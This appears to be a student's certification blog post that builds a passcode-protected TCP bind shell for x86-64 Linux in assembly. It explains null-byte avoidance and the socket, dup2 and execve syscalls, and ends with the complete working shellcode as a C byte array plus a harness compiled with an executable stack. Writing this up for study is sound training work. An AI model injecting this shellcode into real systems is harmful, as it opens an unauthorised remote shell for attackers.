The objective here is to write a tcp_bind_shell in x86-64 assembly that asks for a passcode and contains no null bytes.

So, where to start? By basing our code on the C equivalent source code. Here is what a tcp_bind_shell looks like in C:

A shellcode must obey a few basic rules:

make it as short as possible, since you never know how little memory will be available to inject the shellcode into;

no null bytes, at the very least (there might be other bad characters, but these can be tackled with encoders that avoid them);

no long jumps, since you won’t know the address of the code in memory when the shellcode is executing.

Regarding the reduced size: unlike the C code, we won’t be doing any error checks. That makes sense, since if for some reason you can’t create a socket, for example, what else could an attacker do?

So let’s start by creating the socket [Figure 1 – line 25].

To make a system call on Linux x86_64, we use the syscall instruction. It doesn’t go through the interrupt descriptor table, which makes it faster than the int 0x80 instruction used on the x86 architecture (int 0x80 is still supported on x64). The system call is identified by the number in the RAX register. The parameters are passed in RDI, RSI, RDX, R10, R8, and R9, in this exact order, and the return value is placed in the RAX register.

The syscall numbers to put in RAX can be found in the /usr/include/x86_64-linux-gnu/asm/unistd_64.h file on a 64-bit operating system (in my case: Ubuntu 17.04).
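As a rough sketch of how those numbers can be looked up, the following Python snippet parses `#define __NR_<name> <number>` lines. The excerpt string is an illustrative stand-in for the header (an assumption made so the example is self-contained); on a real system you would read the file itself. The function name `parse_syscall_numbers` is hypothetical.

```python
import re

# Illustrative excerpt in the format used by unistd_64.h (x86_64 numbers).
# On a real system, read the header file instead of this string.
HEADER_EXCERPT = """\
#define __NR_read 0
#define __NR_dup2 33
#define __NR_socket 41
#define __NR_accept 43
#define __NR_bind 49
#define __NR_listen 50
#define __NR_execve 59
"""


def parse_syscall_numbers(header_text):
    """Map syscall names to numbers from '#define __NR_<name> <n>' lines."""
    pattern = re.compile(r"^#define\s+__NR_(\w+)\s+(\d+)\s*$", re.MULTILINE)
    return {name: int(number) for name, number in pattern.findall(header_text)}


syscalls = parse_syscall_numbers(HEADER_EXCERPT)
for name in ("socket", "bind", "listen", "accept", "dup2", "read", "execve"):
    # Print decimal and hex, since the assembly uses the hex form.
    print(f"{name:8s} {syscalls[name]:3d} {syscalls[name]:#04x}")
```

The hex column is the value that ends up in RAX (or AL) before each syscall instruction.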

And Python can definitely help with the constants passed as parameters to the functions.
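For instance, a minimal sketch (assuming a Linux host, where these values apply) that prints the constants needed for the socket call:

```python
import socket

# Values passed to socket(domain, type, protocol) and used in sockaddr_in.
af_inet = int(socket.AF_INET)          # address family: IPv4
sock_stream = int(socket.SOCK_STREAM)  # socket type: TCP
inaddr_any = socket.INADDR_ANY         # 0.0.0.0, i.e. all interfaces

print("AF_INET     =", af_inet)
print("SOCK_STREAM =", sock_stream)
print("INADDR_ANY  =", inaddr_any)
```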

Given all this, the simplest code comes down to:

But if we compile this (# nasm -f elf64 bindshell.nasm -o bindshell.o) and dump the object code (objdump -M intel -d bindshell.o) we realise it has null bytes in it.

A simple way to remove those is to use a xor to zero out a register and then mov the immediate value into the lower byte.

The only issue here is that it’s still 5 bytes long, the same as the original mov instruction. So another way to remove the null bytes is the push/pop combination. The push instruction accepts an 8-bit immediate value and sign-extends it, so for a small positive value the upper bytes are written to the stack as zeros at run time, which removes the excess null bytes from the code.

But the advantage here is the reduced size of both instructions.

This way, we can bring an original 5 byte long instruction, to only 3 bytes, while also removing all null bytes.
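The size and null-byte trade-off can be checked with a small Python sketch. The byte sequences below are the standard encodings of these instructions; treating `mov eax, 0x29` as the 5-byte original is an assumption, since the figure with the original listing is not reproduced here.

```python
# Candidate ways of loading 0x29 (the socket syscall number) into RAX,
# with their machine-code encodings written as hex strings.
CANDIDATES = {
    "mov eax, 0x29": "b8 29 00 00 00",
    "xor rax, rax ; mov al, 0x29": "48 31 c0 b0 29",
    "push 0x29 ; pop rax": "6a 29 58",
}


def summarize(hex_bytes):
    """Return (length in bytes, number of null bytes) for an encoding."""
    code = bytes.fromhex(hex_bytes)
    return len(code), code.count(0)


for asm, hex_bytes in CANDIDATES.items():
    size, nulls = summarize(hex_bytes)
    print(f"{asm:30s} {size} bytes, {nulls} null byte(s)")
```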

But notice that, in figure 6, the mov al,0x29 instruction takes only 2 bytes. It will be used throughout the shellcode, with one caveat: to keep the shellcode reliable, it can only be used when you are sure that previous operations left the upper 7 bytes of the 8-byte register zeroed. Otherwise the register ends up holding the wrong value and the shellcode will fail at some point. That’s why mov al,… is not used to set up the first syscall: we can’t be sure the shellcode will begin execution with these registers zeroed out.

Another way to shrink a 3-byte mov r64, r64 down to 2 bytes is to use the xchg instruction, whose 2-byte form requires RAX as one of the operands. It also comes at a cost, so it has to be used carefully to keep your shellcode from crashing. It obviously should not be used when one of the registers is RSP, and because the exchange goes both ways, you have to make sure both registers end up with acceptable values.

Another reduction that can be made is using the cdq instruction. It sign-extends EAX into EDX and, in 64-bit mode, writing EDX also clears the upper half of RDX. So if EAX holds a non-negative 32-bit value (such as a syscall number), RDX is zeroed out. The advantage is that it’s only one byte long.
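A tiny Python model of cdq may make the behaviour easier to see. This is only a sketch of the instruction's effect on the register value; the function name `cdq` is illustrative.

```python
def cdq(eax):
    """Return the EDX value produced by cdq for a given 32-bit EAX value.

    cdq copies the sign bit (bit 31) of EAX into every bit of EDX.
    In 64-bit mode the write to EDX also zeroes the upper half of RDX,
    so the returned value is the full RDX content as well.
    """
    eax &= 0xFFFFFFFF
    return 0xFFFFFFFF if eax & 0x80000000 else 0


print(hex(cdq(0x29)))        # small positive syscall number
print(hex(cdq(0xFFFFFFFF)))  # negative value, e.g. an error return
```

With a syscall number such as 0x29 in EAX, the result is zero, which is what the third parameter (protocol) of the socket call needs.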

So the code becomes:

Even though it looks longer (more lines), it is actually shorter once assembled.

So now let’s bind the socket to the IP address and tcp port 4444 [Figure 1 – line 36].

The RAX register contains the socket descriptor returned by the socket syscall and, because we want to pass it as the first parameter to the bind syscall, we start by moving it to RDI. Then we build the sockaddr_in structure, which binds to IP 0.0.0.0 (meaning all interfaces) and TCP port 4444. The port is a 2-byte value that must be stored in network byte order (big endian), and since x86-64 is a little endian system, we have to swap the two bytes in the immediate value. 4444 (decimal) is equal to 0x115c (hex). So, by exchanging the two bytes, we get 0x5c11.
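The byte swap can be double-checked with a short Python sketch that does not depend on the byte order of the machine running it:

```python
import struct

port = 4444

# Network byte order (big endian) representation of the port.
network_bytes = struct.pack("!H", port)

# The 16-bit immediate a little endian CPU must hold so that those
# same two bytes end up in memory in that order.
immediate = int.from_bytes(network_bytes, "little")

print(hex(port))            # 0x115c
print(network_bytes.hex())  # 115c
print(hex(immediate))       # 0x5c11
```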

This structure will occupy 16 bytes, and the structure in memory will be (right at the moment when we execute mov rsi,rsp):

Because it’s a little endian system, we have to put this value backwards in the register, and that’s what’s being done with the help of some shifts, so we can avoid the zeroes.

After that, the RSP register is basically pointing to the structure, so we move it to RSI, where it will be sent as a parameter to the bind function.
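To visualise the result, here is a Python sketch that replays the register arithmetic and shows the 16 bytes RSP points to. The instruction sequence in the comments (mov dx, shl, xor dl, two pushes) is my reading of the opcode bytes listed later in this post, so treat it as an assumption rather than the original listing.

```python
import socket
import struct

MASK64 = (1 << 64) - 1

rdx = 0                                  # RDX was zeroed earlier by cdq
rdx = (rdx & ~0xFFFF & MASK64) | 0x5C11  # mov dx, 0x5c11 (swapped port)
rdx = (rdx << 16) & MASK64               # shl rdx, 16
rdx ^= 0x02                              # xor dl, 2 (AF_INET in the low byte)

# Two 8-byte pushes: a zero quadword first, then RDX on top of it.
# RSP points at the most recent push, so RDX comes first in memory.
structure = struct.pack("<Q", rdx) + struct.pack("<Q", 0)

family = int.from_bytes(structure[0:2], "little")  # sin_family
port = int.from_bytes(structure[2:4], "big")       # sin_port (network order)
address = socket.inet_ntoa(structure[4:8])         # sin_addr

print(structure.hex(" "))
print(family, port, address)
```

The first four bytes in memory are 02 00 11 5c, followed by twelve zero bytes for the address and the padding.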

Now we have the listen and accept syscalls [Figure 1 – line 42 and 48].

The listen function sets a flag in the internal socket structure marking the socket as a passive listening socket, one that you can call accept on. It opens the associated port (tcp/4444) so the socket can then start receiving connections from clients.

The accept function asks a listening socket to accept the next incoming connection and return a socket descriptor for that connection. This means it does create a new socket, the client socket, which will be put into RAX as a return value.

At this point, in a well designed, bug free, and memory conscious application, one would close the socket [Figure 1 – line 54]. But for the sake of our size restrictions, I’ll be ignoring that step, as the attacker still will be able to get the desired shell.

Now we move on to redirecting the local process’s stdin and stdout file descriptors to the client socket that connected to the listening port. The client socket must be duplicated onto file descriptor 0 (stdin), so that anything the attacker types into the socket reaches the shell as normal input would. It is also duplicated onto file descriptor 1 (stdout), so that the output generated by the shell is sent back to the attacker and displayed on their screen.

Simply put, it would be something like this:

My only problem with this, is that it generates close to 30 bytes of opcode. But once you look closely at it, you easily detect patterns, which means we can reduce code size by using a loop:

The reason I’m invoking syscall without worrying about the integrity of the RDI and RSI registers is that the kernel guarantees that all registers except RCX and R11 (and, obviously, the return value in RAX) are preserved across the syscall.
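The effect of repeating dup2 over a range of descriptors can be sketched in Python. To keep the example safe to run, a pipe stands in for the client socket and three descriptors opened on the null device stand in for stdin, stdout and stderr; both substitutions are assumptions made for illustration, and `redirect` is a hypothetical helper name.

```python
import os


def redirect(source_fd, target_fds):
    """Make every descriptor in target_fds refer to the same file as source_fd."""
    for fd in target_fds:
        os.dup2(source_fd, fd)


pipe_read, pipe_write = os.pipe()  # stand-in for the client socket
targets = [os.open(os.devnull, os.O_WRONLY) for _ in range(3)]

# Count downwards, as the shortened loop does with descriptors 2, 1, 0.
redirect(pipe_write, sorted(targets, reverse=True))

# Anything written to a redirected descriptor now lands in the pipe.
for fd in targets:
    os.write(fd, b"x")
received = os.read(pipe_read, 3)
print(received)

for fd in targets + [pipe_read, pipe_write]:
    os.close(fd)
```

In the shellcode the same idea applies with the client socket as the source and 2, 1, 0 as the targets.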

One small detail: I’d usually remove the third block of code from the extended version [Figure 13], because it actually duplicates the stderr (file descriptor number 2) and, if we’re being consistent with our “shortest possible” policy, I’d just remove it. But because it actually has no impact on size, on this last shortened piece of code [Figure 14], I’ll just keep it. No harm in that.

Now, the authentication code.

We start by reading a string from the client. The buffer for the incoming string lives on the stack: I reserve 8 bytes for it by pushing the 8-byte RAX register, and then move the RSP value to RSI, which holds the buffer location. The length of the string (including the trailing \n) is returned in the RAX register. This length is used to terminate the comparison between the buffer string and the other string pushed onto the stack, whose address is in the RDI register (assuming all compared bytes are equal until then).
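The comparison logic can be modelled in a few lines of Python. This is a sketch under assumptions: the passcode bytes are taken from the opcode listing later in this post (31 32 33 34 35 36 37 0a), and the model covers the case where at least one byte was read.

```python
PASSCODE = b"1234567\n"  # the 8 bytes pushed onto the stack for comparison


def passcode_matches(received, passcode=PASSCODE):
    """Compare only as many bytes as were read, stopping at the first mismatch."""
    count = len(received)  # the length returned by read, used as the counter
    for i in range(count):
        if received[i] != passcode[i]:
            return False
    return True


print(passcode_matches(b"1234567\n"))  # correct passcode
print(passcode_matches(b"1234568\n"))  # wrong last digit
print(passcode_matches(b"12"))         # short input without a newline
```

One observation from this model (mine, not a claim made in the original write-up): because the comparison is bounded by the number of bytes received, a short input that is a prefix of the passcode and carries no trailing newline also compares equal. A stricter variant would always compare all 8 bytes, at the cost of a few extra bytes of code.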

Now, all that’s left is the /bin/sh call using execve.

The syscall number of execve is 59 (decimal). RDI points to the string “//bin/sh”; RSI points to an array of char*, in which the first entry is the memory location of the “//bin/sh” string and the second is a null pointer; and RDX points to a null pointer, that is, an empty environment array (no need to use any environment variables in the shellcode). This all comes down to the following:
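A likely reason for the doubled slash is that it pads the path to exactly 8 bytes, so it fits in one 64-bit immediate with no null byte, while the kernel treats the extra slash as a single separator. The Python sketch below shows the value that ends up in the register:

```python
path = b"//bin/sh"
short_path = b"/bin/sh"

# Little endian: the first character becomes the least significant byte,
# so pushing the register puts the string in memory in reading order.
immediate = int.from_bytes(path, "little")

print(len(path), hex(immediate), 0 in path)

# The 7-byte variant would need a padding byte to fill the register,
# and a zero padding byte is exactly what the shellcode must avoid.
padded = short_path.ljust(8, b"\x00")
print(len(short_path), 0 in padded)
```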

And it’s done!

We now compile the code:

nasm -f elf64 BindShell.nasm -o BindShell.o && ld BindShell.o -o BindShell

To try the shellcode, we extract the opcodes in hexadecimal format using some command-line ninjutsu:

for i in `objdump -d BindShell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$'`; do echo -n "\x$i"; done
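The same extraction can be sketched in Python. Note that this is a variation rather than a port of the one-liner: it reads only the middle, tab-separated column of each objdump line instead of filtering every whitespace-separated token. The sample text, its addresses, and the function names are illustrative assumptions.

```python
import re

# Illustrative objdump -d output (addresses are made up for the example).
SAMPLE_OBJDUMP = (
    "0000000000400080 <_start>:\n"
    "  400080:\t6a 29                \tpush   0x29\n"
    "  400082:\t58                   \tpop    rax\n"
    "  400083:\t6a 02                \tpush   0x2\n"
)


def extract_opcodes(objdump_text):
    """Collect the instruction bytes from the second column of each line."""
    opcodes = []
    for line in objdump_text.splitlines():
        columns = line.split("\t")
        # Instruction lines look like "  address:<TAB>bytes<TAB>mnemonic".
        if len(columns) < 2 or not columns[0].strip().endswith(":"):
            continue
        opcodes += [t for t in columns[1].split() if re.fullmatch(r"[0-9a-f]{2}", t)]
    return bytes.fromhex("".join(opcodes))


def to_c_string(code):
    """Format bytes as a C string literal body, e.g. \\x6a\\x29."""
    return "".join(f"\\x{byte:02x}" for byte in code)


code = extract_opcodes(SAMPLE_OBJDUMP)
print(to_c_string(code))
print("length:", len(code), "null bytes:", code.count(0))
```

Having the bytes in a Python object also makes it easy to confirm that the result contains no null bytes before pasting it into the C test program.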

The output will be placed inside the following array in C code:

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x52\x66\xba\x11\x5c\x48\xc1\xe2\x10\x80\xf2\x02\x52\x48\x89\xe6\xb0\x31\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x48\x97\x6a\x03\x5e\xb0\x21\xff\xce\x0f\x05\xe0\xf8\x48\x31\xff\x50\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x91\x48\xbb\x31\x32\x33\x34\x35\x36\x37\x0a\x53\x48\x89\xe7\xf3\xa6\x75\x1d\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05\x90";

int main(void)
{
    /* strlen works here only because the shellcode has no null bytes */
    printf("Shellcode Length: %d\n", (int)strlen((const char *)code));
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}

This is then compiled without stack protection and with an executable stack:

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

And finally executed:

You can find all the files on my gitlab account.

On a personal note, just want to give a huge thanks to Vivek Ramachandran and the Pentester Academy team, as I have enjoyed every second of this course since I’ve learned so many interesting things. Thank you!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: PA-2109